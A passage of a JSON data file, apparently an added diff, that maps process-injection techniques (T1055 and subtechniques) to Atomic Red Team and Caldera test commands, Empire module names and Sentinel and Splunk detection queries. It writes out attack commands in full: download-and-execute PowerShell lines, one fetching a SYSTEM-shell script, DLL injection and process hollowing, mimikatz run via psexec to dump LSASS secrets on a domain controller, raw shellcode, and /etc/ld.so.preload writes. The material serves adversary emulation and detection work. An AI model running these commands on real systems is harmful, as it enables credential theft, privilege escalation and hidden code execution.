"T1055.001", + "display_name": "Process Injection: Dynamic-link Library Injection", + "atomic_tests": [ + { + "name": "Process Injection via mavinject.exe", + "auto_generated_guid": "74496461-11a1-4982-b439-4d87a550d254", + "description": "Windows 10 Utility To Inject DLLS.\n\nUpon successful execution, powershell.exe will download T1055.dll to disk. 
Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.\nWith default arguments, expect to see a MessageBox, with notepad's icon in taskbar.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_id": { + "description": "PID of input_arguments", + "type": "Integer", + "default": "(Start-Process notepad -PassThru).id" + }, + "dll_payload": { + "description": "DLL to Inject", + "type": "Path", + "default": "PathToAtomicsFolder\\T1055.001\\src\\x64\\T1055.001.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Utility to inject must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll\" -OutFile \"#{dll_payload}\"\n" + } + ], + "executor": { + "command": "$mypid = #{process_id}\nmavinject $mypid /INJECTRUNNING #{dll_payload}\nStop-Process -processname notepad\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique", + "auto_generated_guid": "8b56f787-73d9-4f1d-87e8-d07e89cbc7f5", + "description": "Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')", + "name": "powershell" + } + } + ] + }, + { + "id": "a74bc239-a196-4f7e-8d5c-fe8c0266071c", + "name": "Signed Binary Execution - odbcconf", + "description": "Leverage odbcconf for DLL injection", + "tactic": "defense-evasion", + 
"technique": { + "attack_id": "T1055.001", + "name": "Process Injection: Dynamic-link Library Injection" + }, + "platforms": { + "windows": { + "psh": { + "command": "odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\sandcat.dll\"}\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by 
at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.004", + "command_list": [ + "PathToAtomicsFolder\\T1055.004\\bin\\T1055.exe\n" + ], + "commands": [ + { + "command": "PathToAtomicsFolder\\T1055.004\\bin\\T1055.exe\n", + "source": "atomics/T1055.004/T1055.004.yaml", + "name": "Atomic Red Team Test - Process Injection: Asynchronous Procedure Call" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1055.004", + "display_name": "Process Injection: Asynchronous Procedure Call", + "atomic_tests": [ + { + "name": "Process Injection via C#", + "auto_generated_guid": "611b39b7-e243-4c81-87a4-7145a90358b1", + "description": "Process Injection using C#\nreference: https://github.com/pwndizzle/c-sharp-memory-injection\nExcercises Five Techniques\n1. Process injection\n2. 
ApcInjectionAnyProcess\n3. ApcInjectionNewProcess\n4. IatInjection\n5. ThreadHijack\nUpon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_binary": { + "description": "Output Binary", + "type": "Path", + "default": "PathToAtomicsFolder\\T1055.004\\bin\\T1055.exe" + } + }, + "executor": { + "command": "#{exe_binary}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": 
"Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.012", + "command_list": [ + ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"C:\\Windows\\System32\\cmd.exe\" -ParentPID $ppid -Verbose\n", + ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process explorer | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"C:\\Windows\\System32\\notepad.exe\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"Word\" -sub \"Exploit\"\n" + ], + "commands": [ + { + "command": ". 
$PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"C:\\Windows\\System32\\cmd.exe\" -ParentPID $ppid -Verbose\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + }, + { + "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process explorer | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + }, + { + "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"C:\\Windows\\System32\\notepad.exe\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + }, + { + "command": ". 
$PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"Word\" -sub \"Exploit\"\n", + "source": "atomics/T1055.012/T1055.012.yaml", + "name": "Atomic Red Team Test - Process Injection: Process Hollowing" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1055.012", + "display_name": "Process Injection: Process Hollowing", + "atomic_tests": [ + { + "name": "Process Hollowing using PowerShell", + "auto_generated_guid": "562427b4-39ef-4e8c-af88-463a78e70b9c", + "description": "This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.\nCredit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "hollow_binary_path": { + "description": "Path of the binary to hollow (executable that will run inside the sponsor)", + "type": "String", + "default": "C:\\Windows\\System32\\cmd.exe" + }, + "parent_process_name": { + "description": "Name of the parent process", + "type": "String", + "default": "explorer" + }, + "sponsor_binary_path": { + "description": "Path of the sponsor binary (executable that will host the binary)", + "type": "String", + "default": "C:\\Windows\\System32\\notepad.exe" + }, + "spawnto_process_name": { + "description": "Name of the process to spawn", + "type": 
"String", + "default": "notepad" + } + }, + "executor": { + "command": ". $PathToAtomicsFolder\\T1055.012\\src\\Start-Hollow.ps1\n$ppid=Get-Process #{parent_process_name} | select -expand id\nStart-Hollow -Sponsor \"#{sponsor_binary_path}\" -Hollow \"#{hollow_binary_path}\" -ParentPID $ppid -Verbose\n", + "cleanup_command": "Stop-Process -Name \"#{spawnto_process_name}\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "RunPE via VBA", + "auto_generated_guid": "3ad4a037-1598-4136-837c-4027e4fa319b", + "description": "This module executes notepad.exe from within the WINWORD.EXE process\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ms_product": { + "description": "Maldoc application Word", + "type": "String", + "default": "Word" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft #{ms_product} must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": 
[ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055", + "command_list": [ + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr 
\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1055\\src\\x64\\T1055-macrocode.txt\" -officeProduct \"Word\" -sub \"Execute\"\n", + "#{psexec_path} /accepteula \\\\DC1 -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "#{psexec_path} /accepteula \\\\#{machine} -c %tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "C:\\PSTools\\PsExec.exe /accepteula \\\\#{machine} -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3", + "powershell/code_execution/invoke_reflectivepeinjection", + "powershell/code_execution/invoke_shellcode", + "powershell/code_execution/invoke_shellcodemsil", + "powershell/credentials/credential_injection", + "powershell/management/psinject", + "powershell/management/reflective_inject", + "powershell/management/shinject", + "python/management/osx/shellcodeinject64", + "```", + "echo #{path_to_shared_library} > /etc/ld.so.preload", + "echo /home/$USER/random.so > /etc/ld.so.preload" + ], + "commands": [ + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" 
-UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1055\\src\\x64\\T1055-macrocode.txt\" -officeProduct \"Word\" -sub \"Execute\"\n", + "source": "atomics/T1055/T1055.yaml", + "name": "Atomic Red Team Test - Process Injection" + }, + { + "command": "#{psexec_path} /accepteula \\\\DC1 -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "source": "atomics/T1055/T1055.yaml", + "name": "Atomic Red Team Test - Process Injection" + }, + { + "command": "#{psexec_path} /accepteula \\\\#{machine} -c %tmp%\\mimikatz\\x64\\mimikatz.exe \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "source": "atomics/T1055/T1055.yaml", + "name": "Atomic Red Team Test - Process Injection" + }, + { + "command": "C:\\PSTools\\PsExec.exe /accepteula \\\\#{machine} -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "source": "atomics/T1055/T1055.yaml", + "name": "Atomic Red Team Test - Process Injection" + }, + { + "command": "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3", + "source": "data/abilities/defense-evasion/a42dfc86-12f0-4f06-b0cf-24830c7f61f4.yml", + "name": "Start a new calculator process" + }, + { + "command": "powershell/code_execution/invoke_reflectivepeinjection", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/code_execution/invoke_shellcode", 
+ "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/code_execution/invoke_shellcodemsil", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/credential_injection", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/psinject", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/reflective_inject", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/shinject", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/management/osx/shellcodeinject64", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo #{path_to_shared_library} > /etc/ld.so.preload", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo /home/$USER/random.so > /etc/ld.so.preload", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1055", + "display_name": "Process Injection", + "atomic_tests": [ + { + "name": "Shellcode execution via VBA", + "auto_generated_guid": "1c91e740-1729-4329-b779-feba6e71d048", + "description": "This module injects shellcode into a newly created process and executes. 
By default the shellcode is created,\nwith Metasploit, for use on x86-64 Windows 10 machines.\n\nNote: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office\nis required.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The 64-bit version of Microsoft Office must be installed\n", + "prereq_command": "try {\n $wdApp = New-Object -COMObject \"Word.Application\"\n $path = $wdApp.Path\n Stop-Process -Name \"winword\"\n if ($path.contains(\"(x86)\")) { exit 1 } else { exit 0 }\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft Word (64-bit) manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing)\nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1055\\src\\x64\\T1055-macrocode.txt\" -officeProduct \"Word\" -sub \"Execute\"\n", + "name": "powershell" + } + }, + { + "name": "Remote Process Injection in LSASS via mimikatz", + "auto_generated_guid": "3203ad24-168e-4bec-be36-f79b13ef8a83", + "description": "Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).\nEspecially useful against domain controllers in Active Directory environments.\nIt must be executed in the context of a user who is privileged on remote `machine`.\n\nThe effect of `/inject` is explained in \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "machine": { + "description": "machine to target (via psexec)", + "type": "String", + "default": "DC1" + }, + "mimikatz_path": { + "description": "Mimikatz windows executable", + "type": "Path", + "default": "%tmp%\\mimikatz\\x64\\mimikatz.exe" + }, + "psexec_path": { + 
"description": "Path to PsExec", + "type": "String", + "default": "C:\\PSTools\\PsExec.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})\n", + "prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\nif (Test-Path $mimikatz_path) {exit 0} else {exit 1}\n", + "get_prereq_command": "$mimikatz_path = cmd /c echo #{mimikatz_path}\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$mimikatz_relative_uri = Invoke-WebRequest \"https://github.com/gentilkiwi/mimikatz/releases/latest\" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like \"*/mimikatz_trunk.zip\" | Select-Object -ExpandProperty href\nInvoke-WebRequest \"https://github.com$mimikatz_relative_uri\" -UseBasicParsing -OutFile \"$env:TEMP\\mimikatz.zip\"\nExpand-Archive $env:TEMP\\mimikatz.zip $env:TEMP\\mimikatz -Force\nNew-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null\nMove-Item $env:TEMP\\mimikatz\\x64\\mimikatz.exe $mimikatz_path -Force\n" + }, + { + "description": "PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})\n", + "prereq_command": "if (Test-Path \"#{psexec_path}\") { exit 0} else { exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"$env:TEMP\\PsTools.zip\"\nExpand-Archive $env:TEMP\\PsTools.zip $env:TEMP\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"#{psexec_path}\") -Force | Out-Null\nCopy-Item $env:TEMP\\PsTools\\PsExec.exe \"#{psexec_path}\" -Force\n" + } + ], + "executor": { + "command": "#{psexec_path} /accepteula \\\\#{machine} -c #{mimikatz_path} \"lsadump::lsa /inject /id:500\" \"exit\"\n", + "name": "command_prompt", + "elevation_required": false + } + } + ] + }, 
+ { + "id": "a42dfc86-12f0-4f06-b0cf-24830c7f61f4", + "name": "Spawn calculator (shellcode)", + "description": "Start a new calculator process", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1055", + "name": "Process Injection" + }, + "platforms": { + "windows": { + "shellcode_amd64": { + "command": "0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3" + } + } + } + }, + { + "Empire Module": "powershell/code_execution/invoke_reflectivepeinjection", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/code_execution/invoke_reflectivepeinjection\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/code_execution/invoke_shellcode", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/code_execution/invoke_shellcode\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/code_execution/invoke_shellcodemsil", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/code_execution/invoke_shellcodemsil\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/credentials/credential_injection", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + 
"Concatenate for Python Dictionary": "\"powershell/credentials/credential_injection\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/management/psinject", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/management/psinject\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/management/reflective_inject", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/management/reflective_inject\": [\"T1055\"]," + }, + { + "Empire Module": "powershell/management/shinject", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"powershell/management/shinject\": [\"T1055\"]," + }, + { + "Empire Module": "python/management/osx/shellcodeinject64", + "ATT&CK Technique #1": "T1055", + "ATT&CK Technique #2": "", + "Technique": "Process Injection", + "Concatenate for Python Dictionary": "\"python/management/osx/shellcodeinject64\": [\"T1055\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_command_line contains \"*Invoke-DllInjection*\"or process_command_line contains \"C:\\\\windows\\\\sysnative\\\\\"", + "name": "Process Injection Process" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit preload_lib", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /etc/ld.so.preload -p wa -k preload_lib", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux 
